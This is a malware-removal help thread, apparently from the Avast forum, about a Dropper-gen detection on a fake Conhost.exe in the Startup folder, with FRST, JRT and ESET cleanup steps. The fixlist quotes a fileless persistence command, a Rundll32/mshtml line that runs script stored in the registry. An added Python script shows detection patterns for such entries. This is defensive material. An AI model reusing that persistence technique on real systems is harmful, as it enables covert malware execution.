win32:Dropper-gen [Drp] - Conhost.exe

I'm sorry if this was brought up millions of times, but I'm horrible when it comes to PC due to unfortunate circumstances, so I need help knowing whether or not this is a problem or just a false positive. So I have this job online where I write articles, and I tend to have multiple tabs open, usually with each one representing an article I'm about to do on it. So I'm doing this, and suddenly I get a virus alert from avast - I'm sorry I didn't think to take a screenshot since most viruses disappear after I choose delete - but I believe what it mentioned was "win32:Dropper-gen [Drp]". When I chose to delete the infected file, another popped up for the same file, I chose the same option and continued doing what I was doing. A couple minutes later I get another 2 popups for the same thing - which has made me suspicious and led me to believe that this might be a virus that's going to require more in terms of knowledge... something I lack greatly.

So I put the thing in my virus chest (that's safe right?) and am unsure what to do. I read a previous post on the avast forum stating that virus alerts concerning "win32:Dropper-gen [Drp]" are fine so long as they are from c:\hp\documentation\ops_shortcut.exe but mine hails from C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup. Additionally, it states the name is "Conhost.exe". 274944 is the filesize if that helps at all. I also had another one that came from C:\Windows\TEMP. When I scan it, all I get is: "Conhost.exe win32:Dropper-gen [Drp]". A couple seconds afterwards I got another virus pop up. (I managed to get a screenshot of one, pictured below)

Again I apologize for my insufficiency about this sort of thing. My father used to do all this for me and was pretty genius, I on the other hand never learned anything, something I feel bad about - and yet he is no longer among the living. Any help would be greatly appreciated. Thank you.

EDIT: I’ve added my logs as suggested by the link given to me.

https://forum.avast.com/index.php?topic=53253.0

Screenshots can be attached here, below the txt box you find… attachments and other options

Thank you, normally I search message boards for pinned topics and such, but considering my paranoia amongst other things I had immediately opted to post as soon as possible.

EDIT: Finishing up my logs now with aswMBR. 3 of my logs have been attached to the main post; when my aswMBR log is done, I'll attach it to this post because of the 4 attachment limit.

You don't have to redo it...
It is much easier to find your logs when you attach them in your reply instead of going back to edit your previous post and attach.
And if not able to attach all in one, just make a new reply and attach the next :wink:

I see. Thank you. My logs so far, as per your advice! It seems Malwarebytes has the most straightforward result. I sincerely hope that my problem can be solved.

I've run AdwCleaner as well, and it has revealed more infections in my registry... apparently AdwCleaner has a "clean" option as well - would that be something I should try to use?

I don’t suppose the few people who have looked have had any luck on what I’ve got and how to get rid of it?

  • Step #1 Fix with FRST
    Make sure that you still have FRST.exe on your Desktop. If you do not have it, download the suitable version from here to your Desktop.
    - Open Notepad.exe. Do not use any other text editor software;
    - Copy and Paste the contents inside the code-box to your Notepad:

        Start
        Closeprocesses:
        Emptytemp:
        Task: {233E7D53-3082-40AA-8664-A8D13B9A8F00} - System32\Tasks\GoogleUpdater => Rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\internet explorer\\zergling_rush"))
        AlternateDataStreams: C:\ProgramData\Microsoft:6yHkzq7ppWVsirfHBp73Pxb
        AlternateDataStreams: C:\ProgramData\Microsoft:Yyean2t4SAfeZ5oaIfY1
        AlternateDataStreams: C:\ProgramData\TEMP:5C321E34
        FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll No File
        End

    - Click on File > Save as...
      - Inside the File Name box type fixlist.txt
      - From the Save as type drop down list, choose All Files
    - Save the file to your Desktop;
    - Re-run FRST.exe and click Fix;
      Note: If FRST advises there is a new updated version to be downloaded, do so/allow this.
    - After the completion, a log will be produced;
    - Attach the log in your next reply.

  • Step #2 Fix with Junkware Removal Tool
    Download Junkware Removal Tool by thisisu to your Desktop from the link below.
    Download Link 1
    Download Link 2
    - Disable your anti-virus to avoid potential conflicts. For more information please acknowledge yourself this article: http://www.bleepingcomputer.com/forums/t/114351/how-to-temporarily-disable-your-anti-virus-firewall-and-anti-malware-programs/
    - Run the program either by double-clicking (Windows XP) or right-clicking and choosing Run as administrator (Windows Vista and above);
    - Please be patient as the tool cleans your system;
    - After completion of the process a log named JRT.txt will automatically open and is saved to your Desktop;
    - Attach the log in your next reply.

  • Step #3 ESET Online Scanner
    Disable your security programs, which includes but is not limited to anti-virus, anti-malware, anti-spyware et cetera. Peruse this for additional information.
    - Download esetsmartinstaller_enu.exe from http://download.eset.com/special/eos/esetsmartinstaller_enu.exe
    - Right-click on the program and choose Run as administrator.
    - Accept their terms and conditions and proceed.
    - Install Add-On/Active X if prompted.
    - From the Computer Scan Setting --
      - Enable detection of potentially unwanted application
      - Click on Advanced Setting
        - Check the following box --
          - Remove Found Threats
        - Check the following boxes --
          - Scan archives;
          - Scan for potentially unsafe applications
          - Enable Anti-Stealth Technology
    - Click on Start and wait for the virus signature database to update.
    - The online scan will begin automatically and can take several hours.
      Note: Do not touch either the Mouse or keyboard during the scan. Otherwise it may stall.
    - After the Scan finishes --
      - If no threats were found:
        - Put a checkmark in Uninstall application on close.
        - Close the program and report that nothing was found
      - If threats were found:
        - Open the file located in C:\Program Files\ESET\ESET Online Scanner\log.txt (32-bit) or C:\Program Files (x86)\ESET\ESET Online Scanner\log.txt (64-bit).
        - Attach the log file in your next reply.
    Note: Enable your security programs afterwards.

  • Required Log(s):
    - FRST Fix Log
    - Junkware Removal Tool Log
    - ESET Log

    Regards,
    Valinorum
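As an added defender-side illustration (not part of this thread, and not FRST's own code), here is a small Python triage script that picks out the three kinds of log entries the fixlist above removes: a scheduled task that launches a script through Rundll32 and reads its body from the registry rather than from a file, non-Zone.Identifier alternate data streams attached under C:\ProgramData, and a file carrying a System32 binary's name (Conhost.exe) sitting in the all-users Startup folder. The log lines are constructed in FRST style and the set of system binary names is an assumption.

```python
import re
from typing import List, Tuple

# Constructed sample of FRST-style scan-log lines. The first Task and the
# first AlternateDataStreams entry are the ones the fixlist above removes;
# the other lines are benign filler added here for contrast.
SAMPLE_LOG = r"""
Task: {233E7D53-3082-40AA-8664-A8D13B9A8F00} - System32\Tasks\GoogleUpdater => Rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\internet explorer\\zergling_rush"))
Task: {0F1E2D3C-4B5A-6978-8796-A5B4C3D2E1F0} - System32\Tasks\FlashUpdate => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
AlternateDataStreams: C:\ProgramData\Microsoft:6yHkzq7ppWVsirfHBp73Pxb
AlternateDataStreams: C:\Users\writer\Downloads\setup.exe:Zone.Identifier
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Conhost.exe ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini ()
"""

# Assumed list: binaries that legitimately live in System32. A copy in a
# Startup folder is a masquerade, like the Conhost.exe in this thread.
SYSTEM_BINARY_NAMES = {"conhost.exe", "svchost.exe", "csrss.exe"}

# Rundll32 driving a javascript: URL through mshtml pulls the real script out
# of the registry at run time, so there is no file on disk to quarantine.
FILELESS_TASK = re.compile(r"rundll32\.exe\s+javascript:|mshtml,RunHTMLApplication", re.I)


def triage(log_text: str) -> List[Tuple[str, str]]:
    """Return (finding, log_line) pairs for entries that deserve a fixlist line."""
    findings = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        kind, _, rest = line.partition(": ")
        if kind == "Task" and FILELESS_TASK.search(rest):
            findings.append(("fileless-task (registry-hosted script)", line))
        elif kind == "AlternateDataStreams":
            path, _, stream = rest.rpartition(":")  # stream name follows the last colon
            if stream != "Zone.Identifier" and path.lower().startswith(r"c:\programdata"):
                findings.append(("hidden-ads under ProgramData", line))
        elif kind == "Startup":
            name = rest.split("\\")[-1].split(" ")[0].lower()  # file name before " ()"
            if name in SYSTEM_BINARY_NAMES:
                findings.append(("system-binary-name in Startup folder", line))
    return findings


if __name__ == "__main__":
    for finding, entry in triage(SAMPLE_LOG):
        print(f"{finding}: {entry}")
```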

Detected nothing with ESET Online Scanner, so just the JRT and Fixlog. Also, I forgot to mention that I did quarantine the infected files in my Avast's virus chest - should I have taken them out before I had done all that?

should I have taken them out before I had done all that?
Of course not. We do not wish a re-infection.

How is your PC?

Well, since I quarantined the files, I haven't had any popups, which were the only real physical indication that something was wrong. I scanned all the files in my virus chest before I did what you suggested and they would usually make a popup appear a second after it was done scanning. I scanned the files again, and I didn't seem to get a popup, so maybe they're okay now? Additionally, AdwCleaner has still found some suspicious things in my registry:

Key Found : HKCU\Software\YahooPartnerToolbar
Key Found : [x64] HKCU\Software\YahooPartnerToolbar
Key Found : HKLM\SOFTWARE\Classes\CLSID{6DDA37BA-0553-499A-AE0D-BEBA67204548}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID{6DDA37BA-0553-499A-AE0D-BEBA67204548}

I don’t use Yahoo Toolbar btw.

Don't mean to double post, but I just wanted affirmation on my previous post. Thank you.

Please, use the Clean option of AdwCleaner. It will remove the keys and post a fresh FRST scan log for my perusal.

I cleaned with the program, log says the files were disposed of. Scanned again afterwards, nothing else came up, so I guess I'm good to go then. I guess it's probably safe to remove those files from my Avast's virus chest too. Thanks for the help!

Post the FRST scan log just to be sure that nothing is left unattended.